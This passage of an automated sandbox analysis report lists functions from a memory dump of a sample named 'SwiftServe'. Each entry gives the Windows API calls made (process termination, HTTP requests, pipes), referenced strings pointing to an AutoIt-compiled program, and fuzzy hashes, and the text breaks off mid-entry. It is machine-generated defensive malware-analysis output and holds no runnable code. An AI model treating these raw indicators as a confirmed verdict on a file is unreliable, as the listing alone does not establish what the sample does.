MapVirtualKeyW.USER32(00000011,00000000), ref: 00E40812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4081A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 46df588cf0db7a8a81b36edf211e873a502f0506cc59ac1bcc38dce901c1e72e
Instruction ID: 08b7bd387c647ca4e279a51a683ccaac9a319601650d736c67a3d6fdd8fc465c
Opcode Fuzzy Hash: 46df588cf0db7a8a81b36edf211e873a502f0506cc59ac1bcc38dce901c1e72e
Instruction Fuzzy Hash: 79016CB09017597DE3008F5A8C85B53FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 00E859A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E859B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E859CA
GetWindowThreadProcessId.USER32(?,?), ref: 00E859D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E859E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E859F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E859F9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a512d8ea0bf56e8bc88f4e7251b821387c94b77ce5622399e4705b439c639a04
Instruction ID: fb082e68699cdf063e1ba512ca9c2f735e7cca0913b68781d248d99161e26693
Opcode Fuzzy Hash: a512d8ea0bf56e8bc88f4e7251b821387c94b77ce5622399e4705b439c639a04
Instruction Fuzzy Hash: E6F03032641158BFE7215B979C0DEEF7B7CEFCAB11F000259FA05B1050DBA06A1587B5

Function 00E877EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E877FE
EnterCriticalSection.KERNEL32(?,?,00E2C2B6,?,?), ref: 00E8780F
TerminateThread.KERNEL32(00000000,000001F6,?,00E2C2B6,?,?), ref: 00E8781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E2C2B6,?,?), ref: 00E87829

Part of subcall function 00E871F0: CloseHandle.KERNEL32(00000000,?,00E87836,?,00E2C2B6,?,?), ref: 00E871FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00E8783C
LeaveCriticalSection.KERNEL32(?,?,00E2C2B6,?,?), ref: 00E87843

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: d3830666c50d82857c1bbec9dd65739be9e35e5cad95a2bb8462029ded192ffe
Instruction ID: f4b5cab851c1e69cc0b5ca2cfe0e13d63486d98da621d99b6dc2f383ac258e7e
Opcode Fuzzy Hash: d3830666c50d82857c1bbec9dd65739be9e35e5cad95a2bb8462029ded192ffe
Instruction Fuzzy Hash: 56F08232145212AFD7152BA5EC8CAEB7779FF45742F241621F207B50B2CBB5A809CB60

Function 00E7954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E79555
UnloadUserProfile.USERENV(?,?), ref: 00E79561
CloseHandle.KERNEL32(?), ref: 00E7956A
CloseHandle.KERNEL32(?), ref: 00E79572
GetProcessHeap.KERNEL32(00000000,?), ref: 00E7957B
HeapFree.KERNEL32(00000000), ref: 00E79582

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 17048012755c894f6ca6813c2ba32b42e1bfe7d2ef08feac5d9170de3aaa0bfc
Instruction ID: d9003e2f55ea32f7d2fc34dfa30aae759f43a24f54df0a6840273a8e149f7fe9
Opcode Fuzzy Hash: 17048012755c894f6ca6813c2ba32b42e1bfe7d2ef08feac5d9170de3aaa0bfc
Instruction Fuzzy Hash: 65E05276104505BFDA422BE6EC0C95BBB69FB49722B504721F215A1470CB32A469DB50

Function 00E98CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E98CFD
CharUpperBuffW.USER32(?,?), ref: 00E98E0C
VariantClear.OLEAUT32(?), ref: 00E98F84

Part of subcall function 00E87B1D: VariantInit.OLEAUT32(00000000), ref: 00E87B5D
Part of subcall function 00E87B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00E87B66
Part of subcall function 00E87B1D: VariantClear.OLEAUT32(00000000), ref: 00E87B72

Strings

AUTOIT.ERROR, xrefs: 00E98E12
Incorrect Parameter format, xrefs: 00E98D35, 00E98EF7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: a30acbe684aed6a653b6aead79cd0e627b4d5dd6fad2137a788483823b7ae810
Instruction ID: 33f2f4ee5ce7182cc71628b6a39159a5afcd8bbfb83c08c938b884102dbd078c
Opcode Fuzzy Hash: a30acbe684aed6a653b6aead79cd0e627b4d5dd6fad2137a788483823b7ae810
Instruction Fuzzy Hash: 169190716083019FCB10DF24C58495BBBF5EF89354F14996EF89AAB3A1DB30E905CB51

Function 00E8323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3436A: _wcscpy.LIBCMT ref: 00E3438D

_memset.LIBCMT ref: 00E8332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E8335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E83410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E8343E

Strings

0, xrefs: 00E8331A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 8b5e80a37661579abeabd1c7d83631f8ce7615b116dba3fd0e35ad28691f74d4
Instruction ID: db7250a86c4b36c97bb38749c5c93a1b72c2e2b886628fa20b4d2d1977d57b3b
Opcode Fuzzy Hash: 8b5e80a37661579abeabd1c7d83631f8ce7615b116dba3fd0e35ad28691f74d4
Instruction Fuzzy Hash: BE51A1316083019FD726AF38D945A6BBBE4AF45B18F04262DF8ADB31A1DB70DE44C752

Function 00E82EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E82F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00E82FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EE7890,00000000), ref: 00E83012

Strings

0, xrefs: 00E82F5C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 371b1aa9c1ac3daf3cc3fca666b305aedb6c2a102ff5d6b6f6293755f37af896
Instruction ID: 63526f069c65c66a8b11c2475636c5ea120245e420bf0aab0aee5d3feba06b0c
Opcode Fuzzy Hash: 371b1aa9c1ac3daf3cc3fca666b305aedb6c2a102ff5d6b6f6293755f37af896
Instruction Fuzzy Hash: A841C3312053419FD720EF24C884B5ABBE4AF84714F14561DF56DB72E1DB70EA05CB62

Function 00E9DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E9DEAE

Part of subcall function 00E31462: _memmove.LIBCMT ref: 00E314B0

Strings

cdecl, xrefs: 00E9DF05
winapi, xrefs: 00E9DF1F
none, xrefs: 00E9DF89
stdcall, xrefs: 00E9DF30

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 95554650b382ff93115a0c31a859396a6517fa3d606831c4040e9a305ebbe928
Instruction ID: 7a8e4800df43a78bb6a1915872666f501f495731daba89814af5c60779cc1384
Opcode Fuzzy Hash: 95554650b382ff93115a0c31a859396a6517fa3d606831c4040e9a305ebbe928
Instruction Fuzzy Hash: 7F319270A04225AFCF10EF54CD419EEB7B4FF45314B10966AE866B77D1DB31A905CB80

Function 00E79A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E79ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E79ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E79B0F

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Strings

ListBox, xrefs: 00E79A8B
ComboBox, xrefs: 00E79A56

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 99075ebd2fdb917e07449357f4a96ed0a5bd18e7f8287e2fa9450e0d688276a3
Instruction ID: 65a0fb5c342c1c090ba371a00bd4d50881f492972f40690f4230c7f1d673e77e
Opcode Fuzzy Hash: 99075ebd2fdb917e07449357f4a96ed0a5bd18e7f8287e2fa9450e0d688276a3
Instruction Fuzzy Hash: 4A21D6719012047EDB18EBA4DC49DFFBBB8DF45350F14A21AF829B72D1DB34590A9660

Function 00E91EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E91F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E91F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E91F6E
InternetCloseHandle.WININET(00000000), ref: 00E91FB5

Part of subcall function 00E92B4F: GetLastError.KERNEL32(?,?,00E91EE3,00000000,00000000,00000001), ref: 00E92B64
Part of subcall function 00E92B4F: SetEvent.KERNEL32(?,?,00E91EE3,00000000,00000000,00000001), ref: 00E92B79

Strings

, xrefs: 00E91F5F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: a5e40bfee3e052f251f0c368ab22ada876d22bd6c8e55a8c87432c423529918e
Instruction ID: be041a12f0a7b8f8624926bf7b43387a58400f86a227afef0c30b744567dde1a
Opcode Fuzzy Hash: a5e40bfee3e052f251f0c368ab22ada876d22bd6c8e55a8c87432c423529918e
Instruction Fuzzy Hash: 5F2180B160420DBEEF11AF608C85EBFB7EDEF48784F10515AF505B6240EB24AD055AA1

Function 00EA6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E2214F
Part of subcall function 00E22111: GetStockObject.GDI32(00000011), ref: 00E22163
Part of subcall function 00E22111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E2216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EA6A86
LoadLibraryW.KERNEL32(?), ref: 00EA6A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EA6AA2
DestroyWindow.USER32(?), ref: 00EA6AAA

Strings

SysAnimate32, xrefs: 00EA6A61

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 3ea1368d6b1337e5e4d00854e08bf4367f2ff49ac081b073d7f1d9bb80d37847
Instruction ID: e8771e59b29e096f7898cc0668eda8638569a2fdeeb624926e023d2551435e60
Opcode Fuzzy Hash: 3ea1368d6b1337e5e4d00854e08bf4367f2ff49ac081b073d7f1d9bb80d37847
Instruction Fuzzy Hash: 2A216F71200205AFEF108F64DC81EBB77ADEB5B368F18A619FA51BA190D371EC519760

Function 00E87357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00E87377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E873AA
GetStdHandle.KERNEL32(0000000C), ref: 00E873BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E873F6

Strings

nul, xrefs: 00E873F1

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 664ab5a4940fa41d08f013f6a948a28ffaa7ff4d36d291fe66840d079391463c
Instruction ID: a4c1cc7646d55627c69130fc37d2ce0a9775c75b0e359c53c665c13b74be0f34
Opcode Fuzzy Hash: 664ab5a4940fa41d08f013f6a948a28ffaa7ff4d36d291fe66840d079391463c
Instruction Fuzzy Hash: 70216B7050820AAFDB20AF69DC05A9A7BA4AF54724F305A19FCECF72E0D770D854DB51

Function 00E87425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E87444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E87476
GetStdHandle.KERNEL32(000000F6), ref: 00E87487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E874C1

Strings

nul, xrefs: 00E874BC

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f8796439d2726efc791f365f1eb33239fe09f0bcc38528cdf53436cba225a047
Instruction ID: 9c5cc4a9f1459eb9e3e87a0ceeb0be3e876fdf1a68a01881521e71e8c0340258
Opcode Fuzzy Hash: f8796439d2726efc791f365f1eb33239fe09f0bcc38528cdf53436cba225a047
Instruction Fuzzy Hash: 7C21A1715082059FDB20AFA99C44A9ABBE8AF55724F301B09F9F8F72E0D770D844C750

Function 00E8B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E8B2EB
__swprintf.LIBCMT ref: 00E8B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00EB0980), ref: 00E8B342

Strings

%lu, xrefs: 00E8B2FE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: f38ff39a4ac86793bdeb50f2862e7182c689ff698b51925b161699023360b3e1
Instruction ID: 00904623f73478408c3c8bef6a04caa09b7cfe74c7ae1ca247c7bc0d642925bb
Opcode Fuzzy Hash: f38ff39a4ac86793bdeb50f2862e7182c689ff698b51925b161699023360b3e1
Instruction Fuzzy Hash: 33219270600208AFCB10EFA5D845DAFBBF8EF89704B104069F809F7292DB31EA05CB61

Function 00E7AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Part of subcall function 00E7AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7AA6F
Part of subcall function 00E7AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7AA82
Part of subcall function 00E7AA52: GetCurrentThreadId.KERNEL32 ref: 00E7AA89
Part of subcall function 00E7AA52: AttachThreadInput.USER32(00000000), ref: 00E7AA90

GetFocus.USER32 ref: 00E7AC2A

Part of subcall function 00E7AA9B: GetParent.USER32(?), ref: 00E7AAA9

GetClassNameW.USER32(?,?,00000100), ref: 00E7AC73
EnumChildWindows.USER32(?,00E7ACEB), ref: 00E7AC9B
__swprintf.LIBCMT ref: 00E7ACB5

Strings

%s%d, xrefs: 00E7ACAF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 4f86b14093c35d64cdc892bda0d130b95b2bcb306c67e32adc3cd7b60f4f582e
Instruction ID: 7143e38da87114afa89c713a2d221a6b9d2060fd91446c90731a329e724cc6f0
Opcode Fuzzy Hash: 4f86b14093c35d64cdc892bda0d130b95b2bcb306c67e32adc3cd7b60f4f582e
Instruction Fuzzy Hash: AE119375600205BBDF12BFA0DD85FEE77ACAB84710F0490B9BE0CBA142DA709945DB75

Function 00E822E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E82318

Strings

REMOVE, xrefs: 00E8231E
APPEND, xrefs: 00E82351
KEYS, xrefs: 00E8232F
EXISTS, xrefs: 00E82340

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 61935a0f07a0424fefa52127df34edf0a6df274b724d6c542e32f04554bfba0d
Instruction ID: 359296fce08eb7369eb79b575e90c505618c0efe16598c006532a39051e5af64
